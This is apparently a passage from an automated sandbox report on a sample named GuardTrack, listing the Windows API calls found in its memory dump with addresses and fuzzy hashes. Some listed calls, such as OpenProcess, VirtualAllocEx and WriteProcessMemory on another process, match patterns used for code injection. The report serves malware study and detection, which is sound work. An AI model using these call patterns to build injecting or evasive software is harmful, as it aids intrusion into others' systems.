                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: bdfc97848b4c1340bc410afee8e46a95e6757e9fafbb1b2ea17208a767ccdcb2
                                                          • Instruction ID: d0a87feb1bd323b5bc53491d8c347999c8e29247abc1dba195502eda47441f97
                                                          • Opcode Fuzzy Hash: bdfc97848b4c1340bc410afee8e46a95e6757e9fafbb1b2ea17208a767ccdcb2
                                                          • Instruction Fuzzy Hash: 32114C76904618FBD7019FE89C04ADBBFAFAB85321F140256F929D3361D671898087F0
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00608E3C
                                                          • GetLastError.KERNEL32(?,00608900,?,?,?), ref: 00608E46
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00608900,?,?,?), ref: 00608E55
                                                          • HeapAlloc.KERNEL32(00000000,?,00608900,?,?,?), ref: 00608E5C
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00608E73
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 6c3e6ee061ad7c4b434e01e64587548a27c0a77cffc850771b14c48e73f3291f
                                                          • Instruction ID: e0fe85a7026b4e3ae537f6a5d6f619082b2861179b0770f87989b1ba157256a1
                                                          • Opcode Fuzzy Hash: 6c3e6ee061ad7c4b434e01e64587548a27c0a77cffc850771b14c48e73f3291f
                                                          • Instruction Fuzzy Hash: 5A018174240214FFEB249FA5DC48DAB7FBEEF8A754B100529FA89C3260DB719C10CA60
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0061581B
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00615829
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615831
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0061583B
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 735f830dcfe90a22c41c885efeb91ac210d812a995b9a2cac8e38b5c4ccaa845
                                                          • Instruction ID: 0df07225559ddb400e105de2be1c7ab607aa1ab79b83dcc680fb4d33a0461b58
                                                          • Opcode Fuzzy Hash: 735f830dcfe90a22c41c885efeb91ac210d812a995b9a2cac8e38b5c4ccaa845
                                                          • Instruction Fuzzy Hash: CE011735D01A29DBEF04AFE5D8499EDFBBABB49711F044556E602B2240DB309590CBA1
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?,?,00608073), ref: 00607D45
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D60
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D6E
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?), ref: 00607D7E
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D8A
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 74f1d7721cee6b14fe6675553ed7f834c6e25665fd57beac81624bb1b22c6b78
                                                          • Instruction ID: e4634d3d644982c51c633974ca794878c82a39e64c153a238d7a555a671aaeb9
                                                          • Opcode Fuzzy Hash: 74f1d7721cee6b14fe6675553ed7f834c6e25665fd57beac81624bb1b22c6b78
                                                          • Instruction Fuzzy Hash: 6101B176A01224BFDB114F54DD04BAA7BAEEF48351F105014FD08D2290D771ED00CBA0
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00608CDE
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00608CE8
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00608CF7
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00608CFE
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00608D14
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: efe4d4c69652dd9f621eb6a8f760bacea10935f1e43c66914b985ce1d16c7481
                                                          • Instruction ID: 784a7ba58b8deef375969505639a16470c10a0699c3f0af86e355138eaaf1825
                                                          • Opcode Fuzzy Hash: efe4d4c69652dd9f621eb6a8f760bacea10935f1e43c66914b985ce1d16c7481
                                                          • Instruction Fuzzy Hash: C8F0AF38240214BFEF215FE4DC88EA73BAEEF5AB54B105525FA44C32D0CA709C40DB60
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00608D3F
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00608D49
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D58
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D5F
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D75
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 3d5cab5975e3b8d4a76afeaccb8c61a97aaa25db9cb61da1f01e076e16fd2fb3
                                                          • Instruction ID: a2547f4242f0392ab916c34148dbba59b76c8a44b73f0abda489e151097a1ee9
                                                          • Opcode Fuzzy Hash: 3d5cab5975e3b8d4a76afeaccb8c61a97aaa25db9cb61da1f01e076e16fd2fb3
                                                          • Instruction Fuzzy Hash: 08F0AF34240214AFEB215FA4EC88FA73BAEEF4AB54F041215FA84C32D0CBB09D40DB60
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0060CD90
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0060CDA7
                                                          • MessageBeep.USER32(00000000), ref: 0060CDBF
                                                          • KillTimer.USER32(?,0000040A), ref: 0060CDDB
                                                          • EndDialog.USER32(?,00000001), ref: 0060CDF5
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 5487c8f250709c1bd244875a72177f6ffc11bff448e61c9b4beccc474009ee8c
                                                          • Instruction ID: 999a82058758f23684050b4ca1b6b0b93cb9f1b1abab849275ac3761d9b3b510
                                                          • Opcode Fuzzy Hash: 5487c8f250709c1bd244875a72177f6ffc11bff448e61c9b4beccc474009ee8c
                                                          • Instruction Fuzzy Hash: A901A234584714ABFB245B60DC8EBA67B7AFF01711F000669A682A10E1DBF0A954CA80
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 005B179B
                                                          • StrokeAndFillPath.GDI32(?,?,005EBBC9,00000000,?), ref: 005B17B7
                                                          • SelectObject.GDI32(?,00000000), ref: 005B17CA
                                                          • DeleteObject.GDI32 ref: 005B17DD
                                                          • StrokePath.GDI32(?), ref: 005B17F8
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: dfe6e7e8cbfd335aadc659a5d8c9bea8737e88537efab0520cd9efe0129859eb
                                                          • Instruction ID: caa677be89fc5dc79948bdd9b9b6a5c2a1493ecffe93b0384b86f1e1ff550e1b
                                                          • Opcode Fuzzy Hash: dfe6e7e8cbfd335aadc659a5d8c9bea8737e88537efab0520cd9efe0129859eb
                                                          • Instruction Fuzzy Hash: 22F08130018A48EBEB594F15EC0CB593FA2F701322F049220F92D851F1DB3056D1CF15
                                                          APIs
                                                            • Part of subcall function 005D0FE6: std::exception::exception.LIBCMT ref: 005D101C
                                                            • Part of subcall function 005D0FE6: __CxxThrowException@8.LIBCMT ref: 005D1031
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 005C1680: _memmove.LIBCMT ref: 005C16DB
                                                          • __swprintf.LIBCMT ref: 005BE598
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005BE431
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: 9ceff52117b1e6437d8e37d31853c2479eb234554281031a94aeee4db53e9a93
                                                          • Instruction ID: fe497f1eb39754231328223978bcb40a659dd539c4734d2d28e3c9b5beeb7bda
                                                          • Opcode Fuzzy Hash: 9ceff52117b1e6437d8e37d31853c2479eb234554281031a94aeee4db53e9a93
                                                          • Instruction Fuzzy Hash: FA9192715046029FC724EF64C89ADBEBFA4FFD6300F44091EF592972A2EA24ED44CB56
                                                          APIs
                                                            • Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4
                                                          • CoInitialize.OLE32(00000000), ref: 0061BFFE
                                                          • CoCreateInstance.OLE32(00643D3C,00000000,00000001,00643BAC,?), ref: 0061C017
                                                          • CoUninitialize.OLE32 ref: 0061C034
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: e97e25964e57c1cfaa2e80fefa67486b375d7cf3f0ee5ede85d382212d2ea077
                                                          • Instruction ID: cbb2bb68885147462d731f62cf224d67f2d2cd9c028aaae4ca195a970b428912
                                                          • Opcode Fuzzy Hash: e97e25964e57c1cfaa2e80fefa67486b375d7cf3f0ee5ede85d382212d2ea077
                                                          • Instruction Fuzzy Hash: 30A146756443029FC710DF54C884E9ABBE6FF89324F048998F8999B3A2CB31ED45CB91
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 005D52CD
                                                            • Part of subcall function 005E0320: __87except.LIBCMT ref: 005E035B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: 879ca9c155b320237b9d12fe9bea753a50f46d95860b6fee7c6df69e8bf66f72
                                                          • Instruction ID: b33979f66160ec2554660b5a235ad7884ca809e8a8ab1ba02d89881edd8f5ebd
                                                          • Opcode Fuzzy Hash: 879ca9c155b320237b9d12fe9bea753a50f46d95860b6fee7c6df69e8bf66f72
                                                          • Instruction Fuzzy Hash: B4518C25E0964287CF297B1DCA4137E2F90BB40751F306D6BE0C5863E9FEB48CC89A52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: a00f3b658e7ea88a36380b6025bce245a50d9cfbfaa00d99974507c5837fb363
                                                          • Instruction ID: d0f8d71955bc2132dc49943f44231d8ffc152e410648b6fd18cf5d44a9c87243
                                                          • Opcode Fuzzy Hash: a00f3b658e7ea88a36380b6025bce245a50d9cfbfaa00d99974507c5837fb363
                                                          • Instruction Fuzzy Hash: 7F5100755402568FDF29DF68C848AFA7BA5FF56310F14805AF8929B3D0D734ACA2CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_free
                                                          • String ID: #V\
                                                          • API String ID: 2620147621-1266075302
                                                          • Opcode ID: 97f0b1443659afed24fe3f81e000d69cfbe977271e4ea38369c54c64fc31e184
                                                          • Instruction ID: d59c5a17b8f5f208bfcd9541c4a66286905bc25d6343bd2e5759f6920dc04c99
                                                          • Opcode Fuzzy Hash: 97f0b1443659afed24fe3f81e000d69cfbe977271e4ea38369c54c64fc31e184
                                                          • Instruction Fuzzy Hash: 25515B716047428FDB24CF28C495BABBBE5FF85314F58492EE58987351E731E801CB52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 5d0c022c2f4cf88c7976588dfe878b84908b0cef3e61f3bcf551316a4d9a2336
                                                          • Instruction ID: be4655300bb1fe832e52a4c4ddf6b1ebf9ec3b81b6540271f63dad123e386cfa
                                                          • Opcode Fuzzy Hash: 5d0c022c2f4cf88c7976588dfe878b84908b0cef3e61f3bcf551316a4d9a2336
                                                          • Instruction Fuzzy Hash: E75190719007099FDB24CFA8C889BAABFF5FF44314F14856EE44ADB280E7319585CB50
                                                          APIs
                                                            • Part of subcall function 00611CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00609E4E,?,?,00000034,00000800,?,00000034), ref: 00611CE5
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0060A3F7
                                                            • Part of subcall function 00611C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00609E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00611CB0
                                                            • Part of subcall function 00611BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00611C08
                                                            • Part of subcall function 00611BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00609E12,00000034,?,?,00001004,00000000,00000000), ref: 00611C18
                                                            • Part of subcall function 00611BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00609E12,00000034,?,?,00001004,00000000,00000000), ref: 00611C2E
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0060A464
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0060A4B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: 861b073f2bb446e826dfdd3e81e707fbb1d7b446fd81468dffc85aa6be1d9dfa
                                                          • Instruction ID: 2d4f947cf63cc96fb810271fce7f69738257e2d94dd01a63670d960152994d68
                                                          • Opcode Fuzzy Hash: 861b073f2bb446e826dfdd3e81e707fbb1d7b446fd81468dffc85aa6be1d9dfa
                                                          • Instruction Fuzzy Hash: 49417E7694121CBFDB10DFA4CD85ADEBBB9EF46340F044099FA45B7280DA706E85CBA1
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00640980,00000000,?,?,?,?), ref: 00638004
                                                          • GetWindowLongW.USER32 ref: 00638021
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00638031
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 5ec266f1404cf0a7c9dbd47032fe15c46791397bda3c58b906d0c306596874cb
                                                          • Instruction ID: 92757f389858c826366d442cf7bed3f0fa1c0af329f2b73816a807efda8cbb97
                                                          • Opcode Fuzzy Hash: 5ec266f1404cf0a7c9dbd47032fe15c46791397bda3c58b906d0c306596874cb
                                                          • Instruction Fuzzy Hash: DD31B071204205AFDB258E34CC45BEA7BAAFB45364F244329F975932E0CB30A8948BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00637A86
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00637A9A
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00637ABE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
